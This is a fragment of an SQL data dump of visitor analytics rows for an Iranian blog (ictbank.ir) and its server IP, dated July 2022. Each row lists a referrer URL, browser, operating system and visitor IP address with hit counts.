(22635,'2022-07-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22636,'2022-07-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22637,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.119.81.106','000',0,4,0),
(22638,'2022-07-15','http://82.102.9.14:80/blog','Opera','Windows','10.0',NULL,NULL,'','74.67.116.169','000',0,1,0),
(22639,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.128.6.207','000',0,1,0),
(22640,'2022-07-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22641,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22642,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.142.148.247','000',0,1,0),
(22643,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.76','000',0,4,0),
(22644,'2022-07-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.135','000',0,2,0),
(22645,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.103','000',0,2,0),
(22646,'2022-07-15','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22647,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.252.189.83','000',0,13,0),
(22648,'2022-07-15','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','191.102.182.205','000',0,2,0),
(22649,'2022-07-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.232.79','000',0,2,0),
(22650,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.92.28.161','000',0,11,0),
(22651,'2022-07-15','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.150.66.204','000',0,2,0),
(22652,'2022-07-15','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','158.101.30.206','000',0,2,0),
(22653,'2022-07-15','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.189.38','000',0,1,0),
(22654,'2022-07-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','199.249.230.87','000',0,1,0),
(22655,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.65.154','000',0,1,0),
(22656,'2022-07-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22657,'2022-07-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.226.153.187','000',0,2,0),
(22658,'2022-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22659,'2022-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22660,'2022-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22661,'2022-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22662,'2022-07-15','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22663,'2022-07-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,1,0),
(22664,'2022-07-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.242.52','000',0,1,0),
(22665,'2022-07-16','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','136.243.83.14','000',0,6,0),
(22666,'2022-07-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','63.35.186.11','000',0,1,0),
(22667,'2022-07-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22668,'2022-07-16','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','195.201.124.118','000',0,1,0),
(22669,'2022-07-16','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22670,'2022-07-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22671,'2022-07-16','http://www.design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','120.41.45.194','000',0,2,0),
(22672,'2022-07-16','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','116.203.185.214','000',0,5,0),
(22673,'2022-07-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.210.52','000',0,1,0),
(22674,'2022-07-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.242.51','000',0,1,0),
(22675,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.69.98','000',0,2,0),
(22676,'2022-07-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22677,'2022-07-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.255.34','000',0,2,0),
(22678,'2022-07-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22679,'2022-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22680,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22681,'2022-07-16','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.53.165','000',0,1,0),
(22682,'2022-07-16','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.52.37','000',0,1,0),
(22683,'2022-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(22684,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.245.124','000',0,1,0),
(22685,'2022-07-16','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.108','000',0,1,0),
(22686,'2022-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(22687,'2022-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22688,'2022-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22689,'2022-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22690,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(22691,'2022-07-16','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22692,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.92.112.196','000',0,2,0),
(22693,'2022-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.42','000',0,1,0),
(22694,'2022-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.49','000',0,2,0),
(22695,'2022-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.26','000',0,6,0),
(22696,'2022-07-17','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.231.146.144','000',0,1,0),
(22697,'2022-07-17','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','2.56.59.115','000',0,1,0),
(22698,'2022-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(22699,'2022-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.48','000',0,5,0),
(22700,'2022-07-17','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22701,'2022-07-17','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.163.110.105','000',0,2,0),
(22702,'2022-07-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.99.125.19','000',0,5,0),
(22703,'2022-07-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22704,'2022-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(22705,'2022-07-17','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22706,'2022-07-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','212.102.33.73','000',0,9,0),
(22707,'2022-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22708,'2022-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22709,'2022-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22710,'2022-07-17','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22711,'2022-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.184.236','000',0,1,0),
(22712,'2022-07-17','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','182.140.244.185','000',0,2,0),
(22713,'2022-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22714,'2022-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22715,'2022-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22716,'2022-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22717,'2022-07-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22718,'2022-07-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','123.15.45.206','000',0,2,0),
(22719,'2022-07-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22720,'2022-07-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.129.48.126','000',0,2,0),
(22721,'2022-07-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22722,'2022-07-18','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,6,0),
(22723,'2022-07-18','https://www.bing.com','Chrome','Linux','Unknown',NULL,NULL,'','23.97.205.210','000',0,3,0),
(22724,'2022-07-18','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(22725,'2022-07-18','http://ictbank.ir/','Chrome','OS X','10.13.5',NULL,NULL,'','176.106.246.67','000',0,1,0),
(22726,'2022-07-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22727,'2022-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.171.149.94','000',0,2,0),
(22728,'2022-07-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.167','000',0,1,0),
(22729,'2022-07-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22730,'2022-07-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,2,0),
(22731,'2022-07-18','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','20.211.112.70','000',0,8,0),
(22732,'2022-07-18','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.11','000',0,1,0),
(22733,'2022-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.217.42','000',0,1,0),
(22734,'2022-07-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.43','000',0,4,0),
(22735,'2022-07-18','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','199.244.88.229','000',0,1,0),
(22736,'2022-07-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.46','000',0,2,0),
(22737,'2022-07-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.185.96','000',0,2,0),
(22738,'2022-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(22739,'2022-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(22740,'2022-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22741,'2022-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22742,'2022-07-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22743,'2022-07-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','212.102.33.74','000',0,2,0),
(22744,'2022-07-19','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22745,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22746,'2022-07-19','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22747,'2022-07-19','http://82.102.9.14:80/blog','Chrome','Android','6.0',NULL,NULL,'','49.234.150.132','000',0,2,0),
(22748,'2022-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22749,'2022-07-19','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.201.9.12','000',0,1,0),
(22750,'2022-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(22751,'2022-07-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22752,'2022-07-19','http://82.102.9.14:80/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','66.172.249.145','000',0,1,0),
(22753,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.41','000',0,2,0),
(22754,'2022-07-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,4,0),
(22755,'2022-07-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22756,'2022-07-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22757,'2022-07-19','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','94.131.81.17','000',0,1,0),
(22758,'2022-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22759,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.249.89','000',0,1,0),
(22760,'2022-07-19','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.11','000',0,8,0),
(22761,'2022-07-19','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.242.51','000',0,1,0),
(22762,'2022-07-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(22763,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,3,0),
(22764,'2022-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(22765,'2022-07-19','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','185.39.144.147','000',0,2,0),
(22766,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.136.18','000',0,4,0),
(22767,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.77.222.107','000',0,1,0),
(22768,'2022-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.0.229','000',0,1,0),
(22769,'2022-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,2,0),
(22770,'2022-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22771,'2022-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.119.242.185','000',0,1,0),
(22772,'2022-07-19','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(22773,'2022-07-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(22774,'2022-07-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22775,'2022-07-20','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','212.102.33.76','000',0,2,0),
(22776,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.198.74.5','000',0,1,0),
(22777,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.245.207','000',0,1,0),
(22778,'2022-07-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22779,'2022-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(22780,'2022-07-20','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,1,0),
(22782,'2022-07-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22783,'2022-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(22784,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.213.86.28','000',0,1,0),
(22785,'2022-07-20','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','81.161.229.59','000',0,1,0),
(22786,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.3.8.103','000',0,2,0),
(22787,'2022-07-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','106.75.33.8','000',0,2,0),
(22788,'2022-07-20','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22789,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.28.94','000',0,1,0),
(22790,'2022-07-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22791,'2022-07-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','195.181.246.191','000',0,10,0),
(22792,'2022-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22793,'2022-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22794,'2022-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22795,'2022-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22796,'2022-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22797,'2022-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.162.26','000',0,2,0),
(22798,'2022-07-20','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,1,0),
(22799,'2022-07-20','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,1,0),
(22800,'2022-07-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22801,'2022-07-21','http://ictbank.ir/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.35','000',0,1,0),
(22802,'2022-07-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22803,'2022-07-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','113.190.42.15','000',0,1,0),
(22804,'2022-07-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','181.205.125.194','000',0,1,0),
(22805,'2022-07-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','181.129.251.109','000',0,1,0),
(22806,'2022-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(22807,'2022-07-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22808,'2022-07-21','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','212.193.0.13','000',0,1,0),
(22809,'2022-07-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22810,'2022-07-21','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.74','000',0,2,0),
(22811,'2022-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,3,0),
(22812,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.208.78','000',0,1,0),
(22813,'2022-07-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22814,'2022-07-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22815,'2022-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(22816,'2022-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22817,'2022-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,2,0),
(22818,'2022-07-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22819,'2022-07-21','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','167.71.89.220','000',0,2,0),
(22820,'2022-07-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.247.72.199','000',0,1,0),
(22821,'2022-07-21','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','185.176.221.110','000',0,2,0),
(22822,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.95.157.77','000',0,1,0),
(22823,'2022-07-21','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','154.198.211.138','000',0,3,0),
(22824,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.162.34.24','000',0,1,0),
(22825,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.167.128.56','000',0,1,0),
(22826,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.34.19.33','000',0,1,0),
(22827,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.209.106.143','000',0,1,0),
(22828,'2022-07-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.105','000',0,2,0),
(22829,'2022-07-21','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.198.59.31','000',0,2,0),
(22830,'2022-07-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,11,0),
(22831,'2022-07-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22832,'2022-07-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22833,'2022-07-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(22834,'2022-07-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.240.213','000',0,2,0),
(22835,'2022-07-22','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','185.119.81.105','000',0,6,0),
(22836,'2022-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.172.68.68','000',0,2,0),
(22837,'2022-07-22','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.53.50','000',0,3,0),
(22838,'2022-07-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22839,'2022-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.97','000',0,2,0),
(22840,'2022-07-22','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','93.76.71.182','000',0,2,0),
(22841,'2022-07-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.138.210','000',0,1,0),
(22842,'2022-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(22843,'2022-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22844,'2022-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(22845,'2022-07-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22846,'2022-07-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','74.208.30.51','000',0,1,0),
(22847,'2022-07-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.189.57','000',0,2,0),
(22848,'2022-07-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22849,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.71','000',0,2,0),
(22850,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.105','000',0,2,0),
(22851,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.76','000',0,2,0),
(22852,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.68','000',0,2,0),
(22853,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.75','000',0,3,0),
(22854,'2022-07-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(22855,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,7,0),
(22856,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.97','000',0,6,0),
(22857,'2022-07-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.191.249.25','000',0,6,0),
(22858,'2022-07-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,1,0),
(22859,'2022-07-23','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','52.3.222.235','000',0,1,0),
(22860,'2022-07-23','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,1,0),
(22861,'2022-07-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
